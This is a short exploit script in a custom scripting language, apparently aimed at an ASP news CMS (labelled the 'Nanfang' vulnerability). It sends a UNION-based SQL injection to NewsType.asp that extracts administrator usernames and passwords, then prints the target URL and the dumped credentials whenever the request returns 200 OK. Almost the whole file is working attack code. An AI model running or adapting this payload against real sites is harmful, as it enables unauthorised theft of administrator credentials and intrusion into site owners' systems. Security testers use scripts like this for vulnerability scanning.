#define find = 200 OK
#request url = var
#define payload = /NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
#define qian = title=\"
#define hou = \" target=\

function main(args)
{
	res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[1],find,0)!= "-1")
	{
		print(url."存在南方漏洞：",GettextMiddle(res[0],qian,hou));
	}
}
